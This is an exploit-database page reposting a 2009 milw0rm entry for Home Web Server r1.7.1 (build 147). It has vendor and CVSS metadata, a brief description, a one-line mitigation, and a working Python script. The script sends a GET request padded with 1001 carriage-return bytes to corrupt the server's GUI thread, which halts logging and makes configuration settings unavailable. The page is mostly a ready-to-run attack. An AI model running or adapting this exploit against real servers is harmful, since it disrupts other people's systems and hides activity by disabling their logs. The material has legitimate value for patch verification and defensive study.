Home Web Server - exploit.company

vendor:

Home Web Server

by:

Aodrulez

7,5

CVSS

HIGH

Memory Corruption Exploit

119

CWE

Product Name: Home Web Server

Affected Version From: r1.7.1 (build 147)

Affected Version To: r1.7.1 (build 147)

Patch Exists: YES

Related CWE: N/A

CPE: a:downstairs.dnsalias.net:homewebserver:1.7.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Home Web Server <=r1.7.1 (build 147) "Gui Thread-Memory Corruption Exploit." By: Aodrulez.

This web server when fed with 1006 bytes of chr(0x0d),with the html "GET" parameter,the Server's Gui's Thread gets corrupted.This means, though the web server works normally, (due to Multithreading),No more Logs are generated.Also "all" the web server configuration settings are unavailable.

Mitigation:

Ensure that the web server is running the latest version of the software and that all security patches are applied.

Source

Exploit-DB raw data:

  Home Web Server <=r1.7.1 (build 147) "Gui Thread-Memory Corruption Exploit." By: Aodrulez.

Homepage         : http://downstairs.dnsalias.net/homewebserver.html 
Product Released : 22.4.2009/21:16:58
 

Description:
	This web server when fed with 
1006 bytes of chr(0x0d),with the html
"GET" parameter,the Server's Gui's 
Thread gets corrupted.This means,
though the web server works normally,
(due to Multithreading),No more Logs 
are generated.Also "all" the web server 
configuration settings are unavailable.


	
Exploit (Python):
----------------------------------------------------------
# Echo client program
import socket

HOST = 'localhost'    # The remote host
pORT = 80           # The same port as used by the server
print '####################################'
print '#Home Web Server r1.7.1 (build 147)#'
print '#  Gui Thread Corruption Exploit   #'
print '#                                  #'
print '#          By: Aodrulez            #'
print '#       f3arm3d3ar@gmail.com       #'
print '#                                  #'
print '####################################'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, pORT))
p='GET '+chr(0x0d)*1001+'index.html HTTp/1.0\r\n\r\n'
s.send(p)
s.close()
print '\"'+HOST+'\'s Gui Got Corrupted :P\"     '
---------------------------------------------------------

Greetz Fly out to:
1] Amforked()      : My Mentor.
2] The Blue Genius : :-)
3] www.OrchidSeven.com

# milw0rm.com [2009-04-23]